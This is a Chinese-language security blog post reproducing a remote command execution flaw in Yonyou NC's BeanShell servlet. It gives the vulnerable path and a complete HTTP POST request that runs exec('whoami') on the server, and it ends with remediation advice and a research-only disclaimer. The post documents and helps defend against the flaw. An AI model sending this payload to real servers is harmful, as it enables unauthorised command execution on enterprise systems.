
X友 NC 遠程命令執行
一、漏洞簡介
用友NC是一款企業級管理軟件,在大中型企業廣泛使用。實現建模、開發、繼承、運行、管理一體化的IT解決方案信息化平台。
用友NC存在反序列化漏洞,攻擊者通過構造特定的HTTP請求,可以在目標服務器上遠程執行任意命令。(用友 NC bsh.servlet.BshServlet 存在遠程命令執行漏洞,通過BeanShell 執行遠程命令獲取服務器權限。)
二、漏洞影響
用友NC 全版本
三、漏洞復現
主頁樣式

漏洞url:
/servlet/~ic/bsh.servlet.BshServlet 訪問執行: exec("whoami");

詳細數據包:
POST /servlet/~ic/bsh.servlet.BshServlet host: 127.0.0.1:8080 user-agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 bsh.script=exec("whoami");
簡單批量一下

四、修復建議
1、用友NC為商業軟件,可直接聯系用友官方獲得安全升級方案。
2、在官方安全補丁發布之前,建議相關企業嚴格限制用友NC的訪問權限,禁止外部IP請求用友NC應用。
參考:
https://blog.csdn.net/weixin_45728976/article/details/106560286
http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html?h=%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E
往期用友漏洞:
注意:⚠️
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
如果本文內容侵權或者對貴公司業務或者其他有影響,請聯系作者刪除。
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns 個人簡書:https://www.jianshu.com/u/bf0e38a8d400 個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html 個人博客園:https://www.cnblogs.com/thelostworld/ FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article 語雀博客主頁:https://www.yuque.com/thelostworld

歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”
